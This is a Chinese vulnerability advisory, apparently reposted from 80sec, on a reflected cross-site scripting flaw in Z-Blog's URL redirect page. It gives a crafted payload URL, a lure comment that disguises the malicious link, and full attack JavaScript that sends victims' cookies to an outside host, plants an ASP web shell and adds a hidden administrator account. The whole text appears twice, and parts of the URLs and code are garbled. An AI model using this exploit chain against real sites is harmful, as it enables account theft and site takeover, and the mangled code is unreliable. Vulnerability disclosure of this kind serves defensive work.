Z-blog跨站脚本攻击漏洞
网络安全 2021-07-03 10:02www.168986.cn网络安全知识
漏洞说明Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://.rainbowsoft./。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计 上的一些问题可能带来严重的后果。
漏洞厂商http://.rainbowsoft./
漏洞解析在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理
strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))
其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下
Function URLDecodeForAntiSpam(strUrl)
Dim i,s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl,i,1)
Next
URLDecodeForAntiSpam=s
End Function
在做如上处理之后程序将在c_urlredirect.asp输出url参数
...
<meta http-equiv="refresh" content="0;URL=<%Response.Write strUrl%>“/>
…
精心构造url参数将能构造一个url类型的非持久xss如下
http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>xxx
上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。
而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下
看这个站,有新东西?
[URL=http://.foo./function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>xxx]http://.80sec.[/URL]
用户看到的是http://.80sec.这个信任的站点,而一旦点击将在.foo.域执行恶意用户指定的js,在该js里可以 写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://.80sec./';
//get cookie
x=new Image();
x.src="http://.80sec./c.php?c=" escape(document.cookie);
//get a shell
data="txaContent=<%execute(request("a"))%>“;
postmydata(”http://.0×37./cmd.asp?act=SiteFilePst&path=./UPLOAD/index.asp&opath=”,data);
//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.&edtHomePage=&edtAlias=”;
postmydata(”http://.0×37./cmd.asp?act=UserCrt”,data);
//fool the user
window.location=tolocation;
function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
function postmydata(action,data){
xmlhttp.open(”POST”, action, false);
xmlhttp.setRequestHeader(’Content-Type’, ‘application/x--form-urlencoded’);
xmlhttp.send(data);
return xmlhttp.responseText;
}
漏洞状态已经联系官方,请等待官方公告。
本站内容均为原创,网络推广网站推广转载请务必保留署名与链接!
Z-blog跨站脚本攻击漏洞:http://.80sec./zbog-xss.html
漏洞厂商http://.rainbowsoft./
漏洞解析在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理
strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))
其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下
Function URLDecodeForAntiSpam(strUrl)
Dim i,s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl,i,1)
Next
URLDecodeForAntiSpam=s
End Function
在做如上处理之后程序将在c_urlredirect.asp输出url参数
...
<meta http-equiv="refresh" content="0;URL=<%Response.Write strUrl%>“/>
…
精心构造url参数将能构造一个url类型的非持久xss如下
http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>x
上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。
而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下
看这个站,有新东西?
[URL=http://.foo./function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>x
用户看到的是http://.80sec.这个信任的站点,而一旦点击将在.foo.域执行恶意用户指定的js,在该js里可以 写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://.80sec./';
//get cookie
x=new Image();
x.src="http://.80sec./c.php?c=" escape(document.cookie);
//get a shell
data="txaContent=<%execute(request("a"))%>“;
postmydata(”http://.0×37./cmd.asp?act=SiteFilePst&path=./UPLOAD/index.asp&opath=”,data);
//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.&edtHomePage=&edtAlias=”;
postmydata(”http://.0×37./cmd.asp?act=UserCrt”,data);
//fool the user
window.location=tolocation;
function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
function postmydata(action,data){
xmlhttp.open(”POST”, action, false);
xmlhttp.setRequestHeader(’Content-Type’, ‘application/x--form-urlencoded’);
xmlhttp.send(data);
return xmlhttp.responseText;
}
漏洞状态已经联系官方,请等待官方公告。
本站内容均为原创,网络推广网站推广转载请务必保留署名与链接!
Z-blog跨站脚本攻击漏洞:http://.80sec./zbog-xss.html
上一篇:世界之窗等浏览器本地xss跨域漏洞POC
下一篇:遨游已经修复的三个安全漏洞分析
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座